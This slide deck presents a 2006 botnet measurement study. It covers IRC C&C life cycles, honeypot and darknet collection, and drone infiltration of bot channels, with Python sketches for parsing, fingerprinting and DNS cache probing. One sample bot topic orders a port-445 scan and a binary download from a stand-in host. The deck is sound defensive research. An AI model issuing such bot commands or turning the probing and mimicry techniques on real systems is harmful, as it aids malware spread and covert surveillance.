A Multifaceted Approach to Understand the Botnet Phenomenon
Published: Internet Measurement Conference (IMC) 2006
Presented by Wei-Cheng Xiao
2016/3/29
Outline
Introduction
Overview of IRC-based botnets
Data collection methodology
Analysis results
Related work
Conclusion
Introduction
Botnet:
a network of infected hosts, called bots, that are
controlled by botmasters
The characteristic of botnets
The command and control (C&C) channel
Communication mechanisms
IRC (the majority, easy to distribute)
P2P
HTTP
Why Choose IRC?
Supports several forms of communication
Point-to-point, point-to-multipoint
Supports several forms of data dissemination
Open-source implementations are available
Motivation and Goals
Motivation
Botnet activity is increasing, but little is known
about botnet behavior.
Goals
Gain a better understanding of botnets, including
the prevalence of botnet activity
the diversity of botnet subspecies
the evolution of a botnet
Contributions
The development of a multifaceted infrastructure to
capture and concurrently track multiple botnets in the
wild
A comprehensive analysis of measurements reflecting
several important structural and behavioral aspects of
botnets
The Life Cycle of A Botnet Infection
Step 1: Exploit
Exploit software
vulnerability of victim
hosts
by worms or malicious
email attachments
Step 2: Download Bot Binary
Execute a shellcode to
download bot binary
from a specific location
and install it
Step 3: DNS Lookup (optional)
Resolve the domain name of
the IRC server coded in the
binary
Avoid server unavailability
due to IP blocking
Step 4: Join
Join the IRC server and C&C
channel listed in the binary
Three types of authentication
1. Bots authenticate to join the server using passwords in the binary
2. Bots authenticate to join the C&C channel using passwords in the binary
3. Botmasters authenticate to the bot population to send commands
Step 5: Parse and Execute
Commands
Parse commands from the
channel topic and execute
them
The topic contains default
commands for all bots
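As a rough sketch of Step 5, the snippet below pulls the topic out of an IRC RPL_TOPIC (332) reply and splits it into commands. The numeric 332 and the message layout come from the IRC protocol. The `|` separator, the function names and the sample topic are assumptions made for illustration, since each botnet uses its own command syntax.

```python
def parse_topic(line):
    """Return (channel, topic) from an RPL_TOPIC (332) line, or None."""
    # Layout: ":<server> 332 <nick> <channel> :<topic>"
    if not line.startswith(":"):
        return None
    head, sep, topic = line[1:].partition(" :")
    parts = head.split()
    if not sep or len(parts) != 4 or parts[1] != "332":
        return None
    return parts[3], topic


def split_commands(topic, separator="|"):
    """Split a topic into (command, args) pairs.

    The separator is a hypothetical choice, not taken from any real bot.
    """
    commands = []
    for chunk in topic.split(separator):
        words = chunk.split()
        if words:
            commands.append((words[0], words[1:]))
    return commands


# Hypothetical topic line, as a bot would receive it right after joining.
SAMPLE = ":irc.example.net 332 bot42 #cc :.scan 10.0.0.0/8 445 | .update http://example.invalid/b.exe"
```

Calling `parse_topic(SAMPLE)` yields the channel name and the raw topic, and `split_commands` then gives one entry per default command.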
The Overall Data Collection Architecture
The Three Main Phases
1. Malware collection
Goal: collect bot binaries
2. Binary analysis via gray-box testing
Goal: analyze the binaries
3. Longitudinal tracking of botnets
Goal: track real botnets using the analysis results
Phase 1: Malware Collection
Darknet: an allocated but unused portion of the IP address space
Malware Collection
Environment setup
There are 14 nodes distributed in the PlanetLab testbed.
These nodes have access to the darknet, whose IP space is located in
10 different class A networks.
Nepenthes
Mimics replies generated by vulnerable services to get shellcodes
Pass URLs in the shellcodes to the download station to fetch bot
binaries (why?)
Honeynet
Used to handle cases where Nepenthes failed
Running unpatched Windows XP on VM
VLAN
Gateway
Route darknet traffic to Nepenthes and honeypots
half to Nepenthes, half to honeypots
Rotate routing among 8 class-C networks in the darknet
Use NAT to keep # of honeypots small
Act as a firewall to prevent honeypots from launching outgoing
attacks and cross-infecting each other (VLAN)
Detect and manage IRC connections
Phase 2: Binary analysis
(graybox)
Binary Analysis
Environment setup
A sink (IRC server) monitors all network traffic.
A client, a VM with a clean Windows XP install
on which the binary is executed, is connected to
the sink.
Two steps
Creating network fingerprints
Extracting IRC-related features
The Two Steps
Creating network fingerprints (network level)
fnet = {DNS, IPs, Ports, Scan}
DNS: targets of any DNS requests
IPs: destination IP addresses
Ports: contacted ports on the server side
Scan: whether or not the IP scanning behavior is detected
Extracting IRC-related features (application level)
When an IRC session is detected, an IRC-fingerprint is
created:
firc = {PASS, NICK, USER, MODE, JOIN}.
fnet and firc provide enough information to join a botnet
in the wild.
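The two fingerprints can be pictured as simple records. The sketch below is only an illustration: the field names follow the slide, while the class name, the function name and the rule of keeping the first value seen for each IRC command are assumptions.

```python
from dataclasses import dataclass, field

# The five IRC commands that make up firc, as listed on the slide.
IRC_FIELDS = ("PASS", "NICK", "USER", "MODE", "JOIN")


@dataclass
class NetFingerprint:
    """fnet = {DNS, IPs, Ports, Scan}"""
    dns: set = field(default_factory=set)    # targets of DNS requests
    ips: set = field(default_factory=set)    # destination IP addresses
    ports: set = field(default_factory=set)  # contacted server-side ports
    scan: bool = False                       # was IP scanning detected?


def extract_irc_fingerprint(client_lines):
    """Build firc from the lines a bot sends to the IRC sink."""
    firc = {}
    for line in client_lines:
        command, _, params = line.strip().partition(" ")
        command = command.upper()
        if command in IRC_FIELDS and command not in firc:
            firc[command] = params  # keep the first value seen (assumption)
    return firc
```

Feeding the function the client side of a captured session returns a dictionary with one entry per command the bot actually sent, which is what a tracker would replay to join the real channel.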
Dialect
Dialect: the syntax of botmasters’ commands and their
responses
Learning a botnet’s dialect is required for mimicking
actual bot behavior.
An IRC query engine plays the role of botmaster.
Commands come from
those observed in honeypots
source code of publicly known bots
The output of the querying process becomes the
template.
Phase 3: Longitudinal Tracking of
Botnets
IRC Tracker (Drone):
An IRC client that can join a real-world IRC channel.
A drone is given firc and the template.
Automatically answer queries based on the template
Pretend to be a dutiful bot
Must be intelligent enough
Mimicry improvement
Randomly join and leave
Change external IP
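A drone's template lookup might look roughly like the sketch below. The PRIVMSG line format is standard IRC. The template entries, command names and function name are hypothetical, and a real drone would need far more logic to stay convincing.

```python
# Hypothetical template: botmaster command -> canned response learned
# during the dialect-learning step.
TEMPLATE = {
    ".sysinfo": "cpu: 1800MHz ram: 512MB os: Windows XP",
    ".version": "bot v1.0",
}


def build_reply(template, channel, message):
    """Return the PRIVMSG line a drone would send, or None to stay silent."""
    words = message.split()
    if not words:
        return None
    response = template.get(words[0])
    if response is None:
        return None  # unknown command: stay silent rather than guess
    return f"PRIVMSG {channel} :{response}"
```

Staying silent on unknown commands is a design choice for this sketch only. It avoids sending a malformed answer, but a botmaster may still notice a bot that never reacts.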
DNS Tracking
Most bots find out IRC servers via DNS queries.
Probe about 800,000 real-world DNS servers
Query domain names of the IRC servers
A cache hit implies one or more bots
Shortcomings
Not all DNS servers are probed.
The number of hits gives only a lower bound on the number of bots.
Still useful when the broadcast feature in a botnet is
turned off.
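One common way to test a DNS server for a cache hit is to send a query with the recursion-desired (RD) bit cleared, so the server answers only from its cache. Whether the authors probed in exactly this way is an assumption. The sketch below builds such a query and checks a reply header, and the function names are illustrative.

```python
import struct


def build_probe(domain, query_id=0x1234):
    """Build a DNS A-record query with the RD bit cleared."""
    flags = 0x0000  # standard query; RD (0x0100) deliberately not set
    header = struct.pack("!HHHHHH", query_id, flags, 1, 0, 0, 0)
    qname = b"".join(
        bytes([len(label)]) + label.encode("ascii")
        for label in domain.rstrip(".").split(".")
    ) + b"\x00"
    question = qname + struct.pack("!HH", 1, 1)  # QTYPE=A, QCLASS=IN
    return header + question


def is_cache_hit(response):
    """Treat an error-free response with at least one answer as a hit."""
    if len(response) < 12:
        return False
    _, flags, _, ancount, _, _ = struct.unpack("!HHHHHH", response[:12])
    is_response = bool(flags & 0x8000)  # QR bit
    rcode = flags & 0x000F
    return is_response and rcode == 0 and ancount > 0
```

In practice the probe would be sent over UDP to port 53 of each DNS server and the reply passed to `is_cache_hit`. Counting the servers that report a hit gives the lower bound mentioned above.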
Data collected
Started from Feb. 1st, 2006, including
Traffic traces over the span of 3 months
IRC logs over the span of 3 months, covering
data from more than 100 botnet channels
Results of DNS cache hits from tracking 65 IRC
servers on 800,000 DNS servers for more than 45
days
Botnet Traffic Share
27% of SYNs are from
known botnet spreaders.
76% of SYNs are directed at
target ports.
The two curves reveal
similar traffic patterns.
This is a lower-bound
estimate.
Botnet Prevalence: A Global Look
About 85,000 DNS servers are involved in at least
one botnet activity.
Botnet Spreading Patterns
Two types of botnet:
Type-I: fixed scanning
algorithm
Type-II: variable
scanning algorithm
Out of 192 IRC bots, 34
are Type-I.
Summary of Type-II scanning practices
Botnet Growth Patterns
Predominant Botnet Structures
1. Single IRC server (70%)
Prevalent among small botnets
2. Multiple IRC servers, bridged botnet (30%)
25% of which are publicly known servers
3. A botmaster controls multiple botnets
4. Some botnets migrate
Effective Botnet Sizes and
Botnet Lifetime
Effective size: the # of online bots
The observed effective size was much smaller than
the footprint.
Bots usually stay connected for only 25 minutes.
May be due to client unavailability
More likely, botmasters ask them to leave.
Botnets, however, have long lifetimes
84% of IRC servers were still up at the end of the study.
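The gap between footprint and effective size can be illustrated with a small calculation over join and leave events from an IRC log. Here "footprint" is taken to mean the number of distinct bots ever seen, which is an assumption about how the term is used. The event format and function name are also hypothetical.

```python
def footprint_and_effective_size(events):
    """Compute (footprint, peak effective size) from channel events.

    events: iterable of (timestamp, bot_id, action), where action is
    "join" or "leave".
    """
    seen = set()    # every bot ever observed -> footprint
    online = set()  # bots currently connected -> effective size
    peak = 0
    for _, bot_id, action in sorted(events):
        if action == "join":
            seen.add(bot_id)
            online.add(bot_id)
        elif action == "leave":
            online.discard(bot_id)
        peak = max(peak, len(online))
    return len(seen), peak
```

With short connection times, most bots have already left by the time new ones join, so the peak number online stays well below the number of distinct bots seen.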
Botnet Software Taxonomy
Related Work
Botnet Tracking: Exploring a Root-Cause
Methodology to Prevent DoS Attacks. ESORICS,
2005
Introduces the idea of using honeypots and
active responders to analyze the botnet behavior
Scalability, Fidelity, and Containment in the
Potemkin Virtual Honeyfarm. ACM SIGOPS, 2005
A very useful tool for botnet detection, but not
appropriate for long term botnet tracking
Conclusion
A multifaceted approach is proposed to
understand the botnet phenomenon.
The results show that botnets are a major contributor
to unwanted network traffic.
The scanning pattern of botnets is quite
different from that of autonomous malware.
The effective sizes of botnets are much smaller than
their footprints.